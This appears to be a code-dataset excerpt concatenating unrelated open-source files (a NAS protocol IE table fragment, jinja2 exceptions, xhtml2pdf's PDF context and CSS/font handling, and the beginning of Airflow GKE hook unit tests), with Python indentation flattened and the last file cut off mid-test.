ies.append({ "iei" : "C-", "value" : "Device properties", "type" : "Device properties", "reference" : "9.9.2.0A", "presence" : "O", "format" : "TV", "length" : "1"})
ies.append({ "iei" : "33", "value" : "NBIFOM container", "type" : "NBIFOM container", "reference" : "9.9.4.19", "presence" : "O", "format" : "TLV", "length" : "3-257"})
ies.append({ "iei" : "66", "value" : "Header compression configuration", "type" : "Header compression configuration", "reference" : "9.9.4.22", "presence" : "O", "format" : "TLV", "length" : "5-257"})
ies.append({ "iei" : "7B", "value" : "Extended protocol configuration options", "type" : "Extended protocol configuration options", "reference" : "9.9.4.26", "presence" : "O", "format" : "TLV-E", "length" : "4-65538"})
ies.append({ "iei" : "5C", "value" : "Extended EPS QoS", "type" : "Extended quality of service", "reference" : "9.9.4.30", "presence" : "O", "format" : "TLV", "length" : "12"})
msg_list[key]["ies"] = ies
| agpl-3.0 |
martydill/url_shortener | code/venv/lib/python2.7/site-packages/jinja2/exceptions.py | 977 | 4428 | # -*- coding: utf-8 -*-
"""
jinja2.exceptions
~~~~~~~~~~~~~~~~~
Jinja exceptions.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2._compat import imap, text_type, PY2, implements_to_string
class TemplateError(Exception):
"""Baseclass for all template errors."""
if PY2:
def __init__(self, message=None):
if message is not None:
message = text_type(message).encode('utf-8')
Exception.__init__(self, message)
@property
def message(self):
if self.args:
message = self.args[0]
if message is not None:
return message.decode('utf-8', 'replace')
def __unicode__(self):
return self.message or u''
else:
def __init__(self, message=None):
Exception.__init__(self, message)
@property
def message(self):
if self.args:
message = self.args[0]
if message is not None:
return message
@implements_to_string
class TemplateNotFound(IOError, LookupError, TemplateError):
"""Raised if a template does not exist."""
# looks weird, but removes the warning descriptor that just
# bogusly warns us about message being deprecated
message = None
def __init__(self, name, message=None):
IOError.__init__(self)
if message is None:
message = name
self.message = message
self.name = name
self.templates = [name]
def __str__(self):
return self.message
class TemplatesNotFound(TemplateNotFound):
"""Like :class:`TemplateNotFound` but raised if multiple templates
are selected. This is a subclass of :class:`TemplateNotFound`
exception, so just catching the base exception will catch both.
.. versionadded:: 2.2
"""
def __init__(self, names=(), message=None):
if message is None:
message = u'none of the templates given were found: ' + \
u', '.join(imap(text_type, names))
TemplateNotFound.__init__(self, names and names[-1] or None, message)
self.templates = list(names)
@implements_to_string
class TemplateSyntaxError(TemplateError):
"""Raised to tell the user that there is a problem with the template."""
def __init__(self, message, lineno, name=None, filename=None):
TemplateError.__init__(self, message)
self.lineno = lineno
self.name = name
self.filename = filename
self.source = None
# this is set to True if the debug.translate_syntax_error
# function translated the syntax error into a new traceback
self.translated = False
def __str__(self):
# for translated errors we only return the message
if self.translated:
return self.message
# otherwise attach some stuff
location = 'line %d' % self.lineno
name = self.filename or self.name
if name:
location = 'File "%s", %s' % (name, location)
lines = [self.message, ' ' + location]
# if the source is set, add the line to the output
if self.source is not None:
try:
line = self.source.splitlines()[self.lineno - 1]
except IndexError:
line = None
if line:
lines.append(' ' + line.strip())
return u'\n'.join(lines)
class TemplateAssertionError(TemplateSyntaxError):
"""Like a template syntax error, but covers cases where something in the
template caused an error at compile time that wasn't necessarily caused
by a syntax error. However it's a direct subclass of
:exc:`TemplateSyntaxError` and has the same attributes.
"""
class TemplateRuntimeError(TemplateError):
"""A generic runtime error in the template engine. Under some situations
Jinja may raise this exception.
"""
class UndefinedError(TemplateRuntimeError):
"""Raised if a template tries to operate on :class:`Undefined`."""
class SecurityError(TemplateRuntimeError):
"""Raised if a template tries to do something insecure if the
sandbox is enabled.
"""
class FilterArgumentError(TemplateRuntimeError):
"""This error is raised if a filter was called with inappropriate
arguments
"""
| mit |
tinjyuu/xhtml2pdf | xhtml2pdf/context.py | 2 | 34095 | # -*- coding: utf-8 -*-
from reportlab.lib.enums import TA_LEFT
from reportlab.lib.fonts import addMapping
from reportlab.lib.pagesizes import landscape, A4
from reportlab.lib.styles import ParagraphStyle
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus.frames import Frame, ShowBoundaryValue
from reportlab.platypus.paraparser import ParaFrag, ps2tt, tt2ps
from xhtml2pdf.util import getSize, getCoords, getFile, pisaFileObject, \
getFrameDimensions, getColor
from xhtml2pdf.w3c import css
from xhtml2pdf.xhtml2pdf_reportlab import PmlPageTemplate, PmlTableOfContents, \
PmlParagraph, PmlParagraphAndImage, PmlPageCount
import copy
import logging
import os
import re
import reportlab
import six
TupleType = tuple
ListType = list
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
import xhtml2pdf.default
import xhtml2pdf.parser
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
reportlab.rl_config.warnOnMissingFontGlyphs = 0
log = logging.getLogger("xhtml2pdf")
sizeDelta = 2 # amount to reduce font size by for super and sub script
subFraction = 0.4 # fraction of font size that a sub script should be lowered
superFraction = 0.4
NBSP = u"\u00a0"
def clone(self, **kwargs):
n = ParaFrag(**self.__dict__)
if kwargs:
d = n.__dict__
d.update(kwargs)
# This else could cause trouble in Paragraphs with images etc.
if "cbDefn" in d:
del d["cbDefn"]
n.bulletText = None
return n
ParaFrag.clone = clone
def getParaFrag(style):
frag = ParaFrag()
frag.sub = 0
frag.super = 0
frag.rise = 0
frag.underline = 0 # XXX Need to be able to set color to fit CSS tests
frag.strike = 0
frag.greek = 0
frag.link = None
frag.text = ""
frag.fontName = "Times-Roman"
frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName)
frag.fontSize = style.fontSize
frag.textColor = style.textColor
# Extras
frag.leading = 0
frag.letterSpacing = "normal"
frag.leadingSource = "150%"
frag.leadingSpace = 0
frag.backColor = None
frag.spaceBefore = 0
frag.spaceAfter = 0
frag.leftIndent = 0
frag.rightIndent = 0
frag.firstLineIndent = 0
frag.keepWithNext = False
frag.alignment = TA_LEFT
frag.vAlign = None
frag.borderWidth = 1
frag.borderStyle = None
frag.borderPadding = 0
frag.borderColor = None
frag.borderLeftWidth = frag.borderWidth
frag.borderLeftColor = frag.borderColor
frag.borderLeftStyle = frag.borderStyle
frag.borderRightWidth = frag.borderWidth
frag.borderRightColor = frag.borderColor
frag.borderRightStyle = frag.borderStyle
frag.borderTopWidth = frag.borderWidth
frag.borderTopColor = frag.borderColor
frag.borderTopStyle = frag.borderStyle
frag.borderBottomWidth = frag.borderWidth
frag.borderBottomColor = frag.borderColor
frag.borderBottomStyle = frag.borderStyle
frag.paddingLeft = 0
frag.paddingRight = 0
frag.paddingTop = 0
frag.paddingBottom = 0
frag.listStyleType = None
frag.listStyleImage = None
frag.whiteSpace = "normal"
frag.wordWrap = None
frag.pageNumber = False
frag.pageCount = False
frag.height = None
frag.width = None
frag.bulletIndent = 0
frag.bulletText = None
frag.bulletFontName = "Helvetica"
frag.zoom = 1.0
frag.outline = False
frag.outlineLevel = 0
frag.outlineOpen = False
frag.insideStaticFrame = 0
return frag
def getDirName(path):
parts = urlparse.urlparse(path)
if parts.scheme:
return path
else:
return os.path.dirname(os.path.abspath(path))
class pisaCSSBuilder(css.CSSBuilder):
def atFontFace(self, declarations):
"""
Embed fonts
"""
result = self.ruleset([self.selector('*')], declarations)
data = list(result[0].values())[0]
if "src" not in data:
# invalid - source is required, ignore this specification
return {}, {}
names = data["font-family"]
# Font weight
fweight = str(data.get("font-weight", "normal")).lower()
bold = fweight in ("bold", "bolder", "500", "600", "700", "800", "900")
if not bold and fweight != "normal":
log.warn(self.c.warning("@fontface, unknown value font-weight '%s'", fweight))
# Font style
italic = str(data.get("font-style", "")).lower() in ("italic", "oblique")
# The "src" attribute can be a CSS group but in that case
# ignore everything except the font URI
uri = data['src']
if not isinstance(data['src'], str):
for part in uri:
if isinstance(part, str):
uri = part
break
src = self.c.getFile(uri, relative=self.c.cssParser.rootPath)
self.c.loadFont(
names,
src,
bold=bold,
italic=italic)
return {}, {}
def _pisaAddFrame(self, name, data, first=False, border=None, size=(0, 0)):
c = self.c
if not name:
name = "-pdf-frame-%d" % c.UID()
if data.get('is_landscape', False):
size = (size[1], size[0])
x, y, w, h = getFrameDimensions(data, size[0], size[1])
# print name, x, y, w, h
#if not (w and h):
# return None
if first:
return name, None, data.get("-pdf-frame-border", border), x, y, w, h, data
return (name, data.get("-pdf-frame-content", None),
data.get("-pdf-frame-border", border), x, y, w, h, data)
def _getFromData(self, data, attr, default=None, func=None):
if not func:
func = lambda x: x
if type(attr) in (list, tuple):
for a in attr:
if a in data:
return func(data[a])
return default
else:
if attr in data:
return func(data[attr])
return default
def atPage(self, name, pseudopage, declarations):
c = self.c
data = {}
name = name or "body"
pageBorder = None
if declarations:
result = self.ruleset([self.selector('*')], declarations)
if declarations:
try:
data = result[0].values()[0]
except Exception:
data = result[0].popitem()[1]
pageBorder = data.get("-pdf-frame-border", None)
if name in c.templateList:
log.warn(self.c.warning("template '%s' has already been defined", name))
if "-pdf-page-size" in data:
c.pageSize = xhtml2pdf.default.PML_PAGESIZES.get(str(data["-pdf-page-size"]).lower(), c.pageSize)
isLandscape = False
if "size" in data:
size = data["size"]
if type(size) is not ListType:
size = [size]
sizeList = []
for value in size:
valueStr = str(value).lower()
if type(value) is TupleType:
sizeList.append(getSize(value))
elif valueStr == "landscape":
isLandscape = True
elif valueStr == "portrait":
isLandscape = False
elif valueStr in xhtml2pdf.default.PML_PAGESIZES:
c.pageSize = xhtml2pdf.default.PML_PAGESIZES[valueStr]
else:
raise RuntimeError("Unknown size value for @page")
if len(sizeList) == 2:
c.pageSize = tuple(sizeList)
if isLandscape:
c.pageSize = landscape(c.pageSize)
padding_top = self._getFromData(data, 'padding-top', 0, getSize)
padding_left = self._getFromData(data, 'padding-left', 0, getSize)
padding_right = self._getFromData(data, 'padding-right', 0, getSize)
padding_bottom = self._getFromData(data, 'padding-bottom', 0, getSize)
border_color = self._getFromData(data, ('border-top-color', 'border-bottom-color',\
'border-left-color', 'border-right-color'), None, getColor)
border_width = self._getFromData(data, ('border-top-width', 'border-bottom-width',\
'border-left-width', 'border-right-width'), 0, getSize)
for prop in ("margin-top", "margin-left", "margin-right", "margin-bottom",
"top", "left", "right", "bottom", "width", "height"):
if prop in data:
c.frameList.append(self._pisaAddFrame(name, data, first=True, border=pageBorder, size=c.pageSize))
break
# Frames have to be calculated after we know the pagesize
frameList = []
staticList = []
for fname, static, border, x, y, w, h, fdata in c.frameList:
fpadding_top = self._getFromData(fdata, 'padding-top', padding_top, getSize)
fpadding_left = self._getFromData(fdata, 'padding-left', padding_left, getSize)
fpadding_right = self._getFromData(fdata, 'padding-right', padding_right, getSize)
fpadding_bottom = self._getFromData(fdata, 'padding-bottom', padding_bottom, getSize)
fborder_color = self._getFromData(fdata, ('border-top-color', 'border-bottom-color',\
'border-left-color', 'border-right-color'), border_color, getColor)
fborder_width = self._getFromData(fdata, ('border-top-width', 'border-bottom-width',\
'border-left-width', 'border-right-width'), border_width, getSize)
if border or pageBorder:
frame_border = ShowBoundaryValue()
else:
frame_border = ShowBoundaryValue(color=fborder_color, width=fborder_width)
#fix frame sizing problem.
if static:
x, y, w, h = getFrameDimensions(fdata, c.pageSize[0], c.pageSize[1])
x, y, w, h = getCoords(x, y, w, h, c.pageSize)
if w <= 0 or h <= 0:
log.warn(self.c.warning("Negative width or height of frame. Check @frame definitions."))
frame = Frame(
x, y, w, h,
id=fname,
leftPadding=fpadding_left,
rightPadding=fpadding_right,
bottomPadding=fpadding_bottom,
topPadding=fpadding_top,
showBoundary=frame_border)
if static:
frame.pisaStaticStory = []
c.frameStatic[static] = [frame] + c.frameStatic.get(static, [])
staticList.append(frame)
else:
frameList.append(frame)
background = data.get("background-image", None)
if background:
#should be relative to the css file
background = self.c.getFile(background, relative=self.c.cssParser.rootPath)
if not frameList:
log.warn(c.warning("missing explicit frame definition for content or just static frames"))
fname, static, border, x, y, w, h, data = self._pisaAddFrame(name, data, first=True, border=pageBorder,
size=c.pageSize)
x, y, w, h = getCoords(x, y, w, h, c.pageSize)
if w <= 0 or h <= 0:
log.warn(c.warning("Negative width or height of frame. Check @page definitions."))
if border or pageBorder:
frame_border = ShowBoundaryValue()
else:
frame_border = ShowBoundaryValue(color=border_color, width=border_width)
frameList.append(Frame(
x, y, w, h,
id=fname,
leftPadding=padding_left,
rightPadding=padding_right,
bottomPadding=padding_bottom,
topPadding=padding_top,
showBoundary=frame_border))
pt = PmlPageTemplate(
id=name,
frames=frameList,
pagesize=c.pageSize,
)
pt.pisaStaticList = staticList
pt.pisaBackground = background
pt.pisaBackgroundList = c.pisaBackgroundList
if isLandscape:
pt.pageorientation = pt.LANDSCAPE
c.templateList[name] = pt
c.template = None
c.frameList = []
c.frameStaticList = []
return {}, {}
def atFrame(self, name, declarations):
if declarations:
result = self.ruleset([self.selector('*')], declarations)
# print "@BOX", name, declarations, result
data = result[0]
if data:
try:
data = data.values()[0]
except Exception:
data = data.popitem()[1]
self.c.frameList.append(
self._pisaAddFrame(name, data, size=self.c.pageSize))
return {}, {} # TODO: It always returns empty dicts?
class pisaCSSParser(css.CSSParser):
def parseExternal(self, cssResourceName):
oldRootPath = self.rootPath
cssFile = self.c.getFile(cssResourceName, relative=self.rootPath)
if not cssFile:
return None
if self.rootPath and urlparse.urlparse(self.rootPath).scheme:
self.rootPath = urlparse.urljoin(self.rootPath, cssResourceName)
else:
self.rootPath = getDirName(cssFile.uri)
result = self.parse(cssFile.getData())
self.rootPath = oldRootPath
return result
class pisaContext(object):
"""
Helper class for creation of reportlab story and container for
various data.
"""
def __init__(self, path, debug=0, capacity=-1):
self.fontList = copy.copy(xhtml2pdf.default.DEFAULT_FONT)
self.path = []
self.capacity = capacity
self.node = None
self.toc = PmlTableOfContents()
self.story = []
self.indexing_story = None
self.text = []
self.log = []
self.err = 0
self.warn = 0
self.text = u""
self.uidctr = 0
self.multiBuild = False
self.pageSize = A4
self.template = None
self.templateList = {}
self.frameList = []
self.frameStatic = {}
self.frameStaticList = []
self.pisaBackgroundList = []
self.keepInFrameIndex = None
self.baseFontSize = getSize("12pt")
self.anchorFrag = []
self.anchorName = []
self.tableData = None
self.frag = self.fragBlock = getParaFrag(ParagraphStyle('default%d' % self.UID()))
self.fragList = []
self.fragAnchor = []
self.fragStack = []
self.fragStrip = True
self.listCounter = 0
self.cssText = ""
self.cssDefaultText = ""
self.image = None
self.imageData = {}
self.force = False
self.pathCallback = None # External callback function for path calculations
# Store path to document
self.pathDocument = path or "__dummy__"
parts = urlparse.urlparse(self.pathDocument)
if not parts.scheme:
self.pathDocument = os.path.abspath(self.pathDocument)
self.pathDirectory = getDirName(self.pathDocument)
self.meta = dict(
author="",
title="",
subject="",
keywords="",
pagesize=A4,
)
def UID(self):
self.uidctr += 1
return self.uidctr
# METHODS FOR CSS
def addCSS(self, value):
value = value.strip()
if value.startswith("<![CDATA["):
value = value[9: - 3]
if value.startswith("<!--"):
value = value[4: - 3]
self.cssText += value.strip() + "\n"
# METHODS FOR CSS
def addDefaultCSS(self, value):
value = value.strip()
if value.startswith("<![CDATA["):
value = value[9: - 3]
if value.startswith("<!--"):
value = value[4: - 3]
self.cssDefaultText += value.strip() + "\n"
def parseCSS(self):
# This self-reference really should be refactored. But for now
# we'll settle for using weak references. This avoids memory
# leaks because the garbage collector (at least on cPython
# 2.7.3) isn't aggressive enough.
import weakref
self.cssBuilder = pisaCSSBuilder(mediumSet=["all", "print", "pdf"])
#self.cssBuilder.c = self
self.cssBuilder._c = weakref.ref(self)
pisaCSSBuilder.c = property(lambda self: self._c())
self.cssParser = pisaCSSParser(self.cssBuilder)
self.cssParser.rootPath = self.pathDirectory
#self.cssParser.c = self
self.cssParser._c = weakref.ref(self)
pisaCSSParser.c = property(lambda self: self._c())
self.css = self.cssParser.parse(self.cssText)
self.cssDefault = self.cssParser.parse(self.cssDefaultText)
self.cssCascade = css.CSSCascadeStrategy(userAgent=self.cssDefault, user=self.css)
self.cssCascade.parser = self.cssParser
# METHODS FOR STORY
def addStory(self, data):
self.story.append(data)
def swapStory(self, story=None):
story = story if story is not None else []
self.story, story = copy.copy(story), copy.copy(self.story)
return story
def toParagraphStyle(self, first):
style = ParagraphStyle('default%d' % self.UID(), keepWithNext=first.keepWithNext)
style.fontName = first.fontName
style.fontSize = first.fontSize
style.letterSpacing = first.letterSpacing
style.leading = max(first.leading + first.leadingSpace, first.fontSize * 1.25)
style.backColor = first.backColor
style.spaceBefore = first.spaceBefore
style.spaceAfter = first.spaceAfter
style.leftIndent = first.leftIndent
style.rightIndent = first.rightIndent
style.firstLineIndent = first.firstLineIndent
style.textColor = first.textColor
style.alignment = first.alignment
style.bulletFontName = first.bulletFontName or first.fontName
style.bulletFontSize = first.fontSize
style.bulletIndent = first.bulletIndent
style.wordWrap = first.wordWrap
# Border handling for Paragraph
# Transfer the styles for each side of the border, *not* the whole
# border values that reportlab supports. We'll draw them ourselves in
# PmlParagraph.
style.borderTopStyle = first.borderTopStyle
style.borderTopWidth = first.borderTopWidth
style.borderTopColor = first.borderTopColor
style.borderBottomStyle = first.borderBottomStyle
style.borderBottomWidth = first.borderBottomWidth
style.borderBottomColor = first.borderBottomColor
style.borderLeftStyle = first.borderLeftStyle
style.borderLeftWidth = first.borderLeftWidth
style.borderLeftColor = first.borderLeftColor
style.borderRightStyle = first.borderRightStyle
style.borderRightWidth = first.borderRightWidth
style.borderRightColor = first.borderRightColor
# If no border color is given, the text color is used (XXX Tables!)
if (style.borderTopColor is None) and style.borderTopWidth:
style.borderTopColor = first.textColor
if (style.borderBottomColor is None) and style.borderBottomWidth:
style.borderBottomColor = first.textColor
if (style.borderLeftColor is None) and style.borderLeftWidth:
style.borderLeftColor = first.textColor
if (style.borderRightColor is None) and style.borderRightWidth:
style.borderRightColor = first.textColor
style.borderPadding = first.borderPadding
style.paddingTop = first.paddingTop
style.paddingBottom = first.paddingBottom
style.paddingLeft = first.paddingLeft
style.paddingRight = first.paddingRight
style.fontName = tt2ps(first.fontName, first.bold, first.italic)
return style
def addTOC(self):
styles = []
for i in six.moves.range(20):
self.node.attributes["class"] = "pdftoclevel%d" % i
self.cssAttr = xhtml2pdf.parser.CSSCollect(self.node, self)
xhtml2pdf.parser.CSS2Frag(self, {
"margin-top": 0,
"margin-bottom": 0,
"margin-left": 0,
"margin-right": 0,
}, True)
pstyle = self.toParagraphStyle(self.frag)
styles.append(pstyle)
self.toc.levelStyles = styles
self.addStory(self.toc)
self.indexing_story = None
def addPageCount(self):
if not self.multiBuild:
self.indexing_story = PmlPageCount()
self.multiBuild = True
def dumpPara(self, frags, style):
return
def addPara(self, force=False):
force = (force or self.force)
self.force = False
# Cleanup the trail
try:
rfragList = reversed(self.fragList)
except:
# For Python 2.3 compatibility
rfragList = copy.copy(self.fragList)
rfragList.reverse()
# Find maximum lead
maxLeading = 0
#fontSize = 0
for frag in self.fragList:
leading = getSize(frag.leadingSource, frag.fontSize) + frag.leadingSpace
maxLeading = max(leading, frag.fontSize + frag.leadingSpace, maxLeading)
frag.leading = leading
if force or (self.text.strip() and self.fragList):
# Update paragraph style by style of first fragment
first = self.fragBlock
style = self.toParagraphStyle(first)
# style.leading = first.leading + first.leadingSpace
if first.leadingSpace:
style.leading = maxLeading
else:
style.leading = getSize(first.leadingSource, first.fontSize) + first.leadingSpace
bulletText = copy.copy(first.bulletText)
first.bulletText = None
# Add paragraph to story
if force or len(self.fragAnchor + self.fragList) > 0:
# We need this empty fragment to work around problems in
# Reportlab paragraphs regarding backGround etc.
if self.fragList:
self.fragList.append(self.fragList[- 1].clone(text=''))
else:
blank = self.frag.clone()
blank.fontName = "Helvetica"
blank.text = ''
self.fragList.append(blank)
self.dumpPara(self.fragAnchor + self.fragList, style)
para = PmlParagraph(
self.text,
style,
frags=self.fragAnchor + self.fragList,
bulletText=bulletText)
para.outline = first.outline
para.outlineLevel = first.outlineLevel
para.outlineOpen = first.outlineOpen
para.keepWithNext = first.keepWithNext
para.autoLeading = "max"
if self.image:
para = PmlParagraphAndImage(
para,
self.image,
side=self.imageData.get("align", "left"))
self.addStory(para)
self.fragAnchor = []
first.bulletText = None
# Reset data
self.image = None
self.imageData = {}
self.clearFrag()
# METHODS FOR FRAG
def clearFrag(self):
self.fragList = []
self.fragStrip = True
self.text = u""
def copyFrag(self, **kw):
return self.frag.clone(**kw)
def newFrag(self, **kw):
self.frag = self.frag.clone(**kw)
return self.frag
def _appendFrag(self, frag):
if frag.link and frag.link.startswith("#"):
self.anchorFrag.append((frag, frag.link[1:]))
self.fragList.append(frag)
# XXX Argument frag is useless!
def addFrag(self, text="", frag=None):
frag = baseFrag = self.frag.clone()
# if sub and super are both on they will cancel each other out
if frag.sub == 1 and frag.super == 1:
frag.sub = 0
frag.super = 0
# XXX Has to be replaced by CSS styles like vertical-align and font-size
if frag.sub:
frag.rise = - frag.fontSize * subFraction
frag.fontSize = max(frag.fontSize - sizeDelta, 3)
elif frag.super:
frag.rise = frag.fontSize * superFraction
frag.fontSize = max(frag.fontSize - sizeDelta, 3)
# bold, italic, and underline
frag.fontName = frag.bulletFontName = tt2ps(frag.fontName, frag.bold, frag.italic)
# Replace ­ with empty and normalize NBSP
text = (text
.replace(u"\xad", u"")
.replace(u"\xc2\xa0", NBSP)
.replace(u"\xa0", NBSP))
if frag.whiteSpace == "pre":
# Handle by lines
for text in re.split(r'(\r\n|\n|\r)', text):
# This is an exceptionally expensive piece of code
self.text += text
if ("\n" in text) or ("\r" in text):
# If EOL insert a linebreak
frag = baseFrag.clone()
frag.text = ""
frag.lineBreak = 1
self._appendFrag(frag)
else:
# Handle tabs in a simple way
text = text.replace(u"\t", 8 * u" ")
# Somehow for Reportlab NBSP have to be inserted
# as single character fragments
for text in re.split(r'(\ )', text):
frag = baseFrag.clone()
if text == " ":
text = NBSP
frag.text = text
self._appendFrag(frag)
else:
for text in re.split(u'(' + NBSP + u')', text):
frag = baseFrag.clone()
if text == NBSP:
self.force = True
frag.text = NBSP
self.text += text
self._appendFrag(frag)
else:
frag.text = " ".join(("x" + text + "x").split())[1: - 1]
if self.fragStrip:
frag.text = frag.text.lstrip()
if frag.text:
self.fragStrip = False
self.text += frag.text
self._appendFrag(frag)
def pushFrag(self):
self.fragStack.append(self.frag)
self.newFrag()
def pullFrag(self):
self.frag = self.fragStack.pop()
# XXX
def _getFragment(self, l=20):
try:
return repr(" ".join(self.node.toxml().split()[:l]))
except:
return ""
def _getLineNumber(self):
return 0
def context(self, msg):
return "%s\n%s" % (
str(msg),
self._getFragment(50))
def warning(self, msg, *args):
self.warn += 1
self.log.append((xhtml2pdf.default.PML_WARNING, self._getLineNumber(), str(msg), self._getFragment(50)))
try:
return self.context(msg % args)
except:
return self.context(msg)
def error(self, msg, *args):
self.err += 1
self.log.append((xhtml2pdf.default.PML_ERROR, self._getLineNumber(), str(msg), self._getFragment(50)))
try:
return self.context(msg % args)
except:
return self.context(msg)
# UTILS
def _getFileDeprecated(self, name, relative):
try:
path = relative or self.pathDirectory
if name.startswith("data:"):
return name
if self.pathCallback is not None:
nv = self.pathCallback(name, relative)
else:
if path is None:
log.warn("Could not find main directory for getting filename. Use CWD")
path = os.getcwd()
nv = os.path.normpath(os.path.join(path, name))
if not (nv and os.path.isfile(nv)):
nv = None
if nv is None:
log.warn(self.warning("File '%s' does not exist", name))
return nv
except:
log.warn(self.warning("getFile %r %r %r", name, relative, path), exc_info=1)
def getFile(self, name, relative=None):
"""
Returns a file name or None
"""
if self.pathCallback is not None:
return getFile(self._getFileDeprecated(name, relative))
return getFile(name, relative or self.pathDirectory)
def getFontName(self, names, default="helvetica"):
"""
Name of a font
"""
# print names, self.fontList
if type(names) is not ListType:
if type(names) not in six.string_types:
names = str(names)
names = names.strip().split(",")
for name in names:
if type(name) not in six.string_types:
name = str(name)
font = self.fontList.get(name.strip().lower(), None)
if font is not None:
return font
return self.fontList.get(default, None)
def registerFont(self, fontname, alias=None):
alias = alias if alias is not None else []
self.fontList[str(fontname).lower()] = str(fontname)
for a in alias:
if type(fontname) not in six.string_types:
fontname = str(fontname)
self.fontList[str(a)] = fontname
def loadFont(self, names, src, encoding="WinAnsiEncoding", bold=0, italic=0):
# XXX Just works for local filenames!
if names and src:
file = src
src = file.uri
log.debug("Load font %r", src)
if type(names) is ListType:
fontAlias = names
else:
fontAlias = (x.lower().strip() for x in names.split(",") if x)
# XXX Problems with unicode here
fontAlias = [str(x) for x in fontAlias]
fontName = fontAlias[0]
parts = src.split(".")
baseName, suffix = ".".join(parts[: - 1]), parts[- 1]
suffix = suffix.lower()
if suffix in ["ttc", "ttf"]:
# determine full font name according to weight and style
fullFontName = "%s_%d%d" % (fontName, bold, italic)
# check if font has already been registered
if fullFontName in self.fontList:
log.warn(self.warning("Repeated font embed for %s, skip new embed ", fullFontName))
else:
# Register TTF font and special name
filename = file.getNamedFile()
pdfmetrics.registerFont(TTFont(fullFontName, filename))
# Add or replace missing styles
for bold in (0, 1):
for italic in (0, 1):
if ("%s_%d%d" % (fontName, bold, italic)) not in self.fontList:
addMapping(fontName, bold, italic, fullFontName)
# Register "normal" name and the place holder for style
self.registerFont(fontName, fontAlias + [fullFontName])
elif suffix in ("afm", "pfb"):
if suffix == "afm":
afm = file.getNamedFile()
tfile = pisaFileObject(baseName + ".pfb")
pfb = tfile.getNamedFile()
else:
pfb = file.getNamedFile()
tfile = pisaFileObject(baseName + ".afm")
afm = tfile.getNamedFile()
# determine full font name according to weight and style
fullFontName = "%s_%d%d" % (fontName, bold, italic)
# check if font has already been registered
if fullFontName in self.fontList:
log.warn(self.warning("Repeated font embed for %s, skip new embed", fontName))
else:
# Include font
face = pdfmetrics.EmbeddedType1Face(afm, pfb)
fontNameOriginal = face.name
pdfmetrics.registerTypeFace(face)
# print fontName, fontNameOriginal, fullFontName
justFont = pdfmetrics.Font(fullFontName, fontNameOriginal, encoding)
pdfmetrics.registerFont(justFont)
# Add or replace missing styles
for bold in (0, 1):
for italic in (0, 1):
if ("%s_%d%d" % (fontName, bold, italic)) not in self.fontList:
addMapping(fontName, bold, italic, fontNameOriginal)
# Register "normal" name and the place holder for style
self.registerFont(fontName, fontAlias + [fullFontName, fontNameOriginal])
else:
log.warning(self.warning("wrong attributes for <pdf:font>"))
| apache-2.0 |
subodhchhabra/airflow | tests/contrib/hooks/test_gcp_container_hook.py | 5 | 10109 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from airflow import AirflowException
from airflow.contrib.hooks.gcp_container_hook import GKEClusterHook
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_PROJECT_ID = 'test-project'
ZONE = 'test-zone'
class GKEClusterHookDeleteTest(unittest.TestCase):
def setUp(self):
with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
self.gke_hook = GKEClusterHook(None, None, None)
self.gke_hook.project_id = TEST_PROJECT_ID
self.gke_hook.location = ZONE
self.gke_hook.client = mock.Mock()
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
@mock.patch(
"airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
def test_delete_cluster(self, wait_mock, convert_mock):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_delete = self.gke_hook.client.delete_cluster = mock.Mock()
self.gke_hook.delete_cluster(name=CLUSTER_NAME, retry=retry_mock,
timeout=timeout_mock)
client_delete.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_with(client_delete.return_value)
convert_mock.assert_not_called()
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
@mock.patch(
"airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
def test_delete_cluster_error(self, wait_mock, convert_mock):
# To force an error
self.gke_hook.client.delete_cluster.side_effect = AirflowException('400')
with self.assertRaises(AirflowException):
self.gke_hook.delete_cluster(None)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class GKEClusterHookCreateTest(unittest.TestCase):
def setUp(self):
with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
self.gke_hook = GKEClusterHook(None, None, None)
self.gke_hook.project_id = TEST_PROJECT_ID
self.gke_hook.location = ZONE
self.gke_hook.client = mock.Mock()
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
@mock.patch(
"airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
def test_create_cluster_proto(self, wait_mock, convert_mock):
from google.cloud.container_v1.proto.cluster_service_pb2 import Cluster
mock_cluster_proto = Cluster()
mock_cluster_proto.name = CLUSTER_NAME
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook.client.create_cluster = mock.Mock()
